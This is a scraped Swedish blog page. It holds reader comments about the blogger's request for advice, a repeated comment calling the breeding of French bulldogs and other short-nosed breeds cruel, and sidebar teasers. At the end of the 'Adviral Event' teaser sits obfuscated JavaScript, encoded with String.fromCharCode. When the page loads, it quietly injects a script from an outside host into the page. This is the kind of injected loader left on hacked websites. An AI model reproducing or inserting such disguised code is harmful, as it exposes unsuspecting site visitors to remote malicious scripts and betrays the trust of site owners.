  Leva. Hon löser det o
  Ibland dippar hon men hon har i alla fall
  Levt !!

  Heja dig my ! Du är kämpe !!

  Så d e så !

  • Att my är ”snygg som fan” är det nog ingen som betvivlar, det är inte de detta gäller.

   Hon bad om råd och folk reagerar. Många kommentarer är sakliga och innehåller inga påhopp. Andra är översittar kommentarer och inte så snälla. Men överlag är det flesta konstruktiv kritik iaf enligt mig.

  • Vad har snygghet och kämpe med det hör inlägget att göra??? Hon ställde en fråga / bad om råd och fick många sakliga sådana också så lägg ner det här larvet man måste ju kunna komma med konstruktiva svar / kritik utan att vara elak eller ”inte frisk” som du uttrycker det larvigt och barnslig kommentar.

  • Hannah, det där var inte snällt sagt. Vad är det för fel med det jag skrev? Vad är anledningen att du skrev att jag inte är frisk? Du skrev ni och det innebär även mig. Det är fruktansvärt att skriva en sån mening.

 63. En Fralla är perfekt om man vill lämna mycket pengar hos veterinären. Diskbråck, ledproblem, hudproblem, mag och tarmproblem, ögonproblem, inflammerade nosveck och svansveck och det mest prominenta av allt: andningsproblemen som veterinärer har tjatat om i ett årtionde men som de flesta ägare viftar bort med att det är ”normalt” att man hör andningen, att de snarkar och grymtar. Nej det är inte normalt, människor har avlat på ett utseende som hunden inte mår bra av. Nu börjar aveln av de mest kortnosiga förbjudas i vissa länder, men en kort nos är bara toppen på isberget av alla problem som denna ras för med sig. Avel på kortnosiga raser är djurplågeri. Självklart lever flera av dessa hundar ett fullgott liv, oftast som flitig besökare hos veterinär, men det är ingen ursäkt för att fortsätta avla och köpa dessa raser (Alla sorters bulldog, mops, pekines, perserkatt osv).

 64. En Fralla är perfekt om man vill lämna mycket pengar hos veterinären. Diskbråck, ledproblem, hudproblem, mag och tarmproblem, ögonproblem, inflammerade nosveck och svansveck och det mest prominenta av allt: andningsproblemen som veterinärer har tjatat om i ett årtionde men som de flesta ägare viftar bort med att det är ”normalt” att man hör andningen, att de snarkar och grymtar. Nej det är inte normalt, människor har avlat på ett utseende som hunden inte mår bra av. Nu börjar aveln av de mest kortnosiga förbjudas i vissa länder, men en kort nos är bara toppen på isberget av alla problem som denna ras för med sig. Avel på kortnosiga raser är djurplågeri. Självklart lever flera av dessa hundar ett fullgott liv, oftast som flitig besökare hos veterinär, men det är ingen ursäkt för att fortsätta avla och köpa dessa raser (Alla sorters bulldog, mops, pekines, perserkatt osv).

  • Nej, just hon har nästan avskräckt mig! Jag har ju Känt både Åza och Inez i smart 7 år. Stackars Inez har ju varit, sjuk, med allergier, diskbråck och annat… Så Åza rekomnderar allt annat än just Fransk bulldog….

  • Nej, just hon har nästan avskräckt mig! Jag har ju Känt både Åza och Inez i smart 7 år. Stackars Inez har ju varit, sjuk, med allergier, diskbråck och annat… Så Åza rekomnderar allt annat än just Fransk bulldog….

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/